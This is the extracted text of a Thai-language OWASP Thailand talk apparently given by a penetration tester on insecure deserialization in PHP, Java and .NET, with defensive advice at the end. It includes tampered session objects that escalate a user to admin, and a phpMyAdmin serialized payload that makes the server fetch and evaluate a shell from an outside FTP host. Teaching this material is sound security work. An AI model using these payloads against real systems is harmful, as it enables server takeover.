Web Hacking with Object Deserialization

Web Hacking with
Object Deserialization
Made for
Responsible: Pichaya Morimoto
Version (Date): 1.0 (2020-05-28)
Confidentiality class: Public
บจก.สยามถนัดแฮก
1
OWASP Thailand Chapter

Responsible / Version: Pichaya Morimoto / 1.0 (2020-05-28)
$ whoami
2
Mr. Pichaya (LongCat) Morimoto
Founder | Lead Penetration Tester
Siam Thanat Hack Company Limited
2
Past Events:
★ OWASP Thailand Meeting 2/2017

3
- ...
- Ragnarok Mobile in Security, Red Pill 2019
- Mysterious Crypto in Android Biometrics,
2600 Thailand Meetup 2019/10
- Docker Security Plugin in DevSecOps,
OWASP Day 2020: DevSecOps in Actions
¯_(ツ)_/¯

4
LongCat @
Code Mania 10
Bangkok Uni.
(2015)

Agenda
“Empower your
Application Security Knowledge.”
Key Concepts for:
- Data Serialization
- OWASP Top 10 - A8
- Security Problems
- Java Object Deserialization Exploitation
- PHP Object Deserialization Exploitation
- .NET Object Deserialization Exploitation
- Key Takeaways
5

6
Serialization และ Deserialization คือ?

7
การเก็บขอมูลในไฟล หรือในฐานขอมูล
☑ $number = 1337;
☑ $text = 'sth';
1337
sth
1337
sth
1337
sth
สง
สง
เก็บ
เก็บ

8
★ $fruits = array('apple',
'banana',
'orange');
★ class FooController {
public $foo='bar';
function doX() { ... }
}
$a = new FooController;
?
object ที่มีคา property ติดมาดวย จะ
สงผาน API และจัดเก็บยังไง ??
สงยังไงดี?
เก็บยังไงดี?
สงยังไงดี?

9
การทํา Serialization
https://en.wikipedia.org/wiki/Serialization
สรุปงาย ๆ คือเทคนิคการแปลงคา data
structure หรือตัวแปรตาง ๆ (string, int,
array, linked list, hash map, …) และ
object ที่สรางมาจาก class ใหอยูในรูป
แบบที่สามารถ จัดเก็บ และ สงผาน
network protocol ตาง ๆ เชน HTTP ได

10
★ $fruits = array('apple',
'banana',
'orange');
★ class FooController {
public $foo='bar';
function doX() { ... }
}
$a = new FooController;
Serialization
Deserialization
a:3:{i:0;s:5:"ap
ple";i:1;s:6:"ba
nana";i:2;s:6:"
orange";}
O:13:"FooCon
troller":1:{s:3:"
foo";s:3:"bar";}
$a
$fruits
* ไมรวม method
Byte Streams
Byte Streams

11
Class → Object
- Properties
- Methods
Object
Serialized Data
- Database
- File
- Network Packet
Object
การใช Object Serialization ในระบบ
O:13:"FooCont
roller":1:{s:3:"f
oo";s:3:"bar";}
Serialization Deserialization
class FooController {
public $foo; }
$obj = new FooController;
$obj->foo = 'bar';
$obj = unserialize($serData);
echo $obj->foo;
// bar
serialize($obj) unserialize($obj)

12
Serialization:
serialize()
Deserialization:
unserialize()
PHP Serialization
https://www.php.net/manual/en/function.serialize.php
https://www.php.net/manual/en/function.unserialize.php

13
Java Serialization
Serialize
Deserialize
https://docs.oracle.com/javase/7/docs/api/java/io/
ObjectInputStream.html#readObject()
https://github.com/NickstaDB/SerializationDumper
Magic Byte (File Header):
ACED (hex)

14
Serialization กับ Data Format แบบตาง ๆ
PHP Serialization (Native)
Java Serialization (Native)
.NET Serializations
Python Pickle
Ruby Marshal
...
XStream
Protobuf
Apache Thrift
YAML
JSON
XML, XMLDecoder, XStream
...

15
OWASP Top Ten: Web App Security Risks
A8 - Insecure Deserialization
https://owasp.org/www-pdf-archive/OWASP_Top_10-201
7_%28en%29.pdf.pdf

16
OWASP Top Ten: Web App Security Risks
A8 - Insecure Deserialization
Web Features:
- Export Functions
- User Session
- Remember Me
- Templates
Serialized Data
- Network Packet
- Database
- File
1. Serialization
2. Deserialization
POST / HTTP/1.1
Host: victim.sth.sh
import_data= [...
Serialized Data ...]
deserialize(
Serialized Data)
Web API
Web API
ถาผูใชงานระบบสามารถควบคุม
คา Serialized Data ได?
App Code:
obj = deserialize(USER_INPUT)

17
ปญหาของการทํา Deserialization ที่อาจไมปลอดภัย
1. ถาแฮกเกอรสามารถคุมคา serialized data ได
แฮกเกอรอาจเปลี่ยนคา object นั้นเพื่อทําในสิ่งที่ไมควรทําได
เชน
- object ของ class User ที่มีคา username
เปน longcat อาจโดนเปลี่ยนเปน admin
- คาเงินใน object 100 อาจถูกเปลี่ยนเปน 1337
ผลคือ เกิดชองโหวอะไรก็ไดเหมือนการรับคา
HTTP parameter เขามาแลวประมวลผลไมปลอดภัย
(SQL หรือ Command Injection, Broken AuthZ)
2. ในบางกรณี อาจถูกใส serialized data ที่เมื่อ
deserialize แลว เกิดการเรียก ฟงกชัน
ที่ไมควรถูกเรียกได เชน การรันโคด

18
O:4:"User":3:{s:4:"nam
e";s:7:"pichaya";s:4:"ro
le";s:4:"user";s:3:"age";
i:28;}
O:4:"User":3:{s:4:"nam
e";s:3:"sth";s:4:"role";s:
5:"admin";s:3:"age";i:9
99;}
Tzo0OiJVc2VyIjozOntz
OjQ6Im5hbWUiO3M6N
zoicGljaGF5YSI7czo0
OiJyb2xlIjtzOjQ6InVzZ
XIiO3M6MzoiYWdlIjtpO
jI4O30=
Tzo0OiJVc2VyIjozOntz
OjQ6Im5hbWUiO3M6
Mzoic3RoIjtzOjQ6InJvb
GUiO3M6NToiYWRta
W4iO3M6MzoiYWdlIjtp
Ojk5OTt9

19
HP = 1234
MP = 0
Gold = 129340
“binary serialization is
not easily modifiable
for the common user”

20
ตัวอยางการใชงาน Deserialization บนเว็บ (1)
Session Data as
PHP Serialized Object
ถามี field ใน session data เปน user role หรือ id
เราสามารถแก user ธรรมดาเปน admin ไดไหม?

21
Session Data as
PHP Serialized Object
Singing Signature = MD5(session + secret key) มันคือ MAC (Message
Authentication Code)

22
การทํา Signing Signature ปองกันการแกไขคา
Web Server
Web Browser
(User) Set-Cookie: session=
O:4:"User":3:{s:4:"name";s:7:"pichay
a";s:4:"role";s:4:"user";s:3:"age";i:28;}
Web Server
Web Browser
(User)
Cookie: session=
O:4:"User":3:{s:4:"name";s:3:"
sth";s:4:"role";s:5:"admin";s:3:
"age";i:999;}
1. Server สงคา Serialized Data ใหคนใชเว็บหลังล็อคอิน
user=pichaya&password=P@ssw0rd
2. แฮกเกอรจึงแกไขคา Serialized Data ตัวเองใหเปนคนอื่นได

23
การทํา Signing Signature ปองกันการแกไขคา
Web Server
Web Browser
(User) Set-Cookie: session=
O:4:"User":3:{s:4:"name";s:7:"pichaya";s:4:
"role";s:4:"user";s:3:"age";i:28;}:deadbeef
Web Server
Web Browser
(User)
Cookie: session=
O:4:"User":3:{s:4:"name";s:3:"
"age";i:999;}:deadbeef
1. Server สงคา Serialized Data ใหคนใชเว็บหลังล็อคอิน
พรอมคา signing signature ที่สรางจาก md5(msg + key)
user=pichaya&password=P@ssw0rd
secret_key=longcat
signature=md5(O4:...i
:28;}+secret_key)
สมมุติได deadbeef
2. แฮกเกอรจะแกไขคา Serialized Data ตัวเองไดแตวา
จะไมสามารถแกไขคา signing signature เปนคาที่ถูกได
เพราะคานี้สรางจาก secret key ที่มีแต server ที่รู
Rejected
* ตัวอยางแบบเขาใจงาย เฉย ๆ ของจริงควร
ใช HMAC กับ secret key ที่ปลอดภัย

24
system/libraries/Session.php1
2
3

25
5
system/libraries/Session.php
4
6 encryption_key

26

27
ทํา Signing Signature แลวปลอดภัยแลว?

28
ทํา Signing Signature แลวปลอดภัยแลว? (1)
★ แอปเดียวกันใชหลายที่แลวไมเปลี่ยน secret key
★ Offline Cracking ออกไดถา secret key ไมปลอดภัย
★ ผูไมประสงคดีสามารถเขาถึงโคดได
★ ชองโหวอื่น ๆ ที่สามารถ bypass การตรวจสอบ
หรือทําให secret key หลุดออกมาได
เพื่อที่แฮกเกอรจะไดสราง signing signature เองได
Web Server
Web Browser
(User)
Cookie: session=
O:4:"User":3:{s:4:"name";s:3:"
"age";i:999;}:deadbeef
Rejected

29
Insecure Error
Handling

30
https://<web>/.env
ไฟล .env หลุด

31
ชองโหวอื่น ๆ ของ
Web Framework

32
Web Server
Web Browser
(User)
Cookie: session=
O:4:"User":3:{s:4:"name";s:3:"
"age";i:999;}:abcdef1234
ถาแฮกเกอรได secret key ก็สราง
signing signature เองไดทันที !

33
ปญหาของการทํา Deserialization ที่อาจไมปลอดภัย(ตอ)

34
PHP Serialization (Native)
serialize() การทํา serialization คาไปเก็บ
unserialize() สรางคาตัวแปรหรือ object กลับจากคา serialized data
i:666;666
s:6:"foobar";“foobar”
i:666;666
s:6:"foobar";“foobar”

35
PHP Serialization (Native) - Data Types
String
- s:<size>:<value>;
- s:3:"STH";
Integer
- i:<value>;
- i:1337;
Double
- d:<value>;
- d:12.345;
Null
- N;
Boolean
- b:<value>;
- b:1; // True
- b:0; // False
Array
- a:<size>:{<key>;<value>;}
- a:2:{s:4:"name";s:4:"John"; s:3:"age";i:15;}
// array("name"=>"John", "age"=>15);
Object
O:13:"FooController":1:{s:3:
"foo";s:3:"bar";}

36
PHP Serialization (Native) - PHP Magic Methods
__construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state()
__clone()
__debugInfo()
- ชื่อฟงกชันขึ้นตนดวย "__"
- เปนฟงกชันที่จะถูกเรียกอัตโนมัติไดหลังจากการทํา deserialization (คือ unserailize() ใน PHP)

37
PHP Serialization (Native) - PHP Magic Methods
__destruct()
- ถูกเรียกเมื่อ object กําลังจะหายหลังจบการทํางาน
__wakeup()
- ถูกเรียกหลังจากโดนโยนเขา unserialize()

38
สรุปการแฮกฟงกชัน unserialize() ใน PHP
Serialized Data Magic Methodsunserialize()
มีการรับคา serialized data เขามาจาก user input ($_GET, $_POST, $_COOKIE, …)
และถูกนําไปโยนใสฟงกชัน unserialized() แฮกเกอรอาจจะไป เลือก object ของ class
ที่หลังจากโดน deserialize ไปเรียก Magic Method ที่ทําอะไรบางอยาง อยางอัตโนมัติ
RCE

หา Class ที่มี PHP Magic Method ที่อาจทําใหเราทําอะไร คูล ๆ ได
39
__destruct()

เขียน Exploit โดยสราง Serialized Object ที่ตองการเรียก __destruct
40
สราง Class
พรอม property
serialize แลวสราง signing
signature จาก secret key
URL Encoding Signing Signature

Pwned !
41

Pwned !
42
Magic Methodsunserialize
($ci_session)
RCE

AppServ เวอรชันในตํานาน 2.5.10
43

44
File: /scripts/setup.php Line: 61
ชองโหว PMA 2.10.3

45
__wakeup ／人◕ ‿‿ ◕人＼
File: /libraries/Config.class.php Line: 303 File: /libraries/Config.class.php Line: 373,376
eval(
file_get_contents($source)
)

46
O:10:"PMA_Config":1:{s:6:"source";s:25:"ftp://1.3.3.7/payload.txt";}
วิธีเขียน Exploit นาจา

47
เตรียม Backdoor ใส FTP Server
O:10:"PMA_Config":1:{s:6:"source";s:32:"ftp://10.13.37.10:2121/shell.php";}

Pwn !!
48

ตัวอยาง การแฮกเว็บที่มีชองโหว Insecure Deserialization (PHP)
49
demo1_pma.flv

50
Serialize
Deserialize
https://docs.oracle.com/javase/7/docs/api/java/io/
ObjectInputStream.html#readObject()
https://github.com/NickstaDB/SerializationDumper
Magic Byte (File Header):
ACED (hex)
rO0ABXNyAARVc2VynpG/yC7LDZ
gCAANJAAJpZEkADXBydmlsZWdl
TGV2ZWxMAARuYW1ldAASTGph
dmEvbGFuZy9TdHJpbmc7eHAAA
AABAAAAAHQAB3BpY2hheWE=

51
Web Server
Web Browser
(User)
คา Java Serialized Object
ที่แฮกเกอรแกไขมา
1. แกสิทธิ์ แกจํานวนเงิน แก ฯลฯ
2. ทําการสลับ object อันตราย
ที่เรียก magic method ตาง ๆ

ตัวอยาง การแฮกเว็บที่มีชองโหว Insecure Deserialization (Java)
52
demo2_sdh.flv

53
File:
/sdh-bank-campaign/server/app/src/main/java/sh/
sth/SDHBank/controller/CampaignController.java
ois = <User Input>
ois.readObject();

54

55
YSoSerial
https://github.com/frohoff/ysoserial

56
Java Deser. Gadget:
CommonsCollections5
https://commons.apache.org/prope
r/commons-collections/security-rep
orts.html

57
Java Deser. Gadget:
CommonsCollections5
Serialized
Data

58
Java Deser. Gadget:
CommonsCollections5
https://github.com/frohoff/ysoserial/b
lob/master/src/main/java/ysoserial/p
ayloads/CommonsCollections5.java

59
Java Deser. Gadget:
CommonsCollections5
BadAttributeValueExpException.readObject()
เอาคาที่เก็บมา
toString()
ถูก deserialize จะ
เรียก readObject()

60
Java Deser. Gadget:
CommonsCollections5
TiedMapEntry.toString()

61
Java Deser. Gadget:
CommonsCollections5
LazyMap.get()

62
Java Deser. Gadget:
CommonsCollections5
ChainedTransformer.transform()

63
InvokerTransformer.transform()
Java Deser. Gadget:
CommonsCollections5

64
Java Deser. Gadget:
CommonsCollections5

65
Java Deser. Gadget:
CommonsCollections5
https://commons.apache.org/prope
r/commons-collections/security-rep
orts.html
Application Security Hardening Tip:
อยาใช Java Library รุนเกา ใหอัปเดตเปนรุน
ลาสุด ใหมที่สุดที่ทําได นอกจากชองโหวใน
โคดแอป ก็อาจมีชองโหวใน Library เองดวย

66
Java Deser. Gadget: Jdk7u21
https://gist.github.com/frohoff/24af7
913611f8406eaf3

67
Java Deser. Gadget: Jdk7u21
https://gist.github.com/frohoff/24af7
913611f8406eaf3
Application Security Hardening Tip:
อยาใช JDK รุนเกา ใหอัปเดตเปนรุนลาสุด
ใหมที่สุดที่ทําได นอกจากชองโหวในโคดแอ
ป ก็อาจมีชองโหวใน JDK เองดวย

68
วิธีแกไขชองโหว Insecure Deserialization (Java)
อยาทําการ Deserialize ในการเขียน
โปรแกรม โดยเฉพาะคาที่รับมาจาก
User Input เชน HTTP Parameter
https://www.pinterest.com/pin/680958406133567782/

69
ถายังตองการใช กําหนดให java.io.ObjectInputStream รูวามี Object อะไรบาง
ที่จะยอมใหเกิดการ Deserialize ไดบาง เรียกวาการทํา whitelisting
ตัวอยางงาย ๆ เชนการ overwrite คราส ObjectInputStream ใหเช็ค Object กอน
https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Deserialization_
Cheat_Sheet.md#harden-your-own-javaioobjectinputstream

70
1
3
2
4

71
5
6

72
https://github.com/ikkisoft/SerialKiller
look-ahead Java deserialization library

73
5
6
*** วิธีนี้ แกไดเฉพาะปองกันการปองกัน การ
deserialize คา Object นอกเหนือจากที่เรา
whitelist ไว (ที่เราเรียกวา gadget) แตไมได
ปองกันการแกไข attribute ของ Object ของ
class ที่เรายอมให deserialize ได (ที่อยูใน
whitelist)
ดังนั้น จึงตองทํา input validation กับคาใน
Object ที่รับเขามา ควบคูกันไปดวย

74
Insecure Deserialization (.NET)
Many types built into .NET framework have code that will run just because they are
instantiated.
The example of .NET magic methods:
- Constructors
- OnDeserialize Handlers
- Setters / Getters
- Destructors

75
.NET Serialization Gadget
Start with an easy gadget: TempFileCollection
Read this by yourself if you dare:
https://github.com/microsoft/referencesource/blob/master/System/compmod/system/codedom/compiler/TempFiles.cs#L34

76
Start with an easy gadget: TempFileCollection
Controllable Object Attributes
This gadget cannot RCE
Delete Temp Directory in
Destructor Method

77
Make it harder: TypeConfuseDelegate
This is too hard. Read it yourself please:
https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html
ใชไดยัน .NET Framework
เวอรชั่นลาสุด

78
We have 3 friends as follows:
- ComparisonComparer
- MulticastDelegate
- SortedSet
1
2
3 4

79
ComparisonComparer class SortedSet class
Process::Start(Executable, Args)
??
1
2
เราจะเรียก...
4
3
ตรง ๆ ไมไดเพราะตอง Comparison Type

80
MulticastDelegate
Fields:
- _invocationList
- _invocationCount
- ...
ComparisonA(A, B)
ComparisonB(A, B)
ComparisonC(A, B) Replace this delegate with
Process::Start(Executable, Args)
1
2
3

81
Let test TypeConfuseDelegate gadget
Demo Video: demo3_typeconfusedelegate.flv

ViewState
82
_VIEWSTATE value will be deserialized with
ObjectStateFormatter to be ViewState object.

83
ViewState Security Configuration
EnableViewStateMac
)
https://en.wikipedia.org/wiki/Message_authentication_code
viewStateEncryptionMode
คือการเขารหัส viewstate ดวย MachineKey
MachineKey
คือ key ที่ใชในการเขารหัส ถอดรหัส ตรวจสอบ
ความถูกตองของ forms-authentication และ
viewstate
key จะอยูใน web.config หรือ machine.config

ชองโหวที่เกี่ยวของกับ ViewState
EnableViewStateMac=false, viewStateEncryptionMode=false
HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkv4.0.30319
viewStateEncryptionMode จะถูกตั้งเปน false เปนคา
default
ถาหาก EnableViewStateMac หรือ
viewStateEncryptionMode ถูกเปด จําเปนตองใช
MachineKey ในการ โจมตี
84
Web.config

ตรวจสอบ ViewState ดวย Burp Suite
85
ViewState MAC is Disabled
ViewState MAC is Enabled
ViewState MAC is Encrypted

86
ลองแฮก ViewState ดวย
Insecure Deserialization
Let hack Insecure ViewState Serialization with TypeConfuseDelegate Gadget
Demo Video: demo4_viewstate.flv

87
Key Takeaways
#1 Do NOT Deserialize Untrusted Data
#2 Logging and Monitoring

88
#1 Do NOT Deserialize Untrusted Data
- ใช Data Format ที่ Deserialize แลว.. คอนขางปลอดภัย (จาก magic function ตาง ๆ) *
JSON*** (?)
XML*** (?)
Protobuf
ถาตองการใชอยางเลี่ยงไมไดจริง ๆ ...
- Deserialize เฉพาะคา serialized object ที่ sign มาถูกตอง (ใช HMAC)
- Deserialize เฉพาะบาง object ที่เรา whitelist ไว ดวยวิธี look-ahead
- ทํา Input Validation กับ คา property ของ Object ที่รับเขามา วาถูกตองเหมาะสม

89
#2 Logging and Monitoring
- เก็บ log การกระทําสําคัญในระบบ
- เขาระบบ, ออกระบบ ของ admin
- โอนเงิน, จายเงิน, เปลี่ยนรหัสผาน ฯลฯ
- เปลี่ยน log ทุก 60 - 90 วัน
- ตั้งการ alert เมื่อเกิดเหตุการณไมปกติใน log
- เกิด error ในการทํา deserialization เยอะ ๆ
- มี process ประหลาดโผลมา (EDR ?)
- ...

สําหรับ Pen-Tester หรือ Security Tester
90
https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsh
eets/Deserialization_Cheat_Sheet.md
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
https://github.com/frohoff/ysoserial
https://github.com/pwntester/ysoserial.net

Any Question ?
Contact us:
pentest@sth.sh
OWASP Thailand Chapter:
https://www.facebook.com/groups/owaspthailand/

Web Hacking with Object Deserialization

More Related Content

What's hot (13)

More from Pichaya Morimoto (15)

Web Hacking with Object Deserialization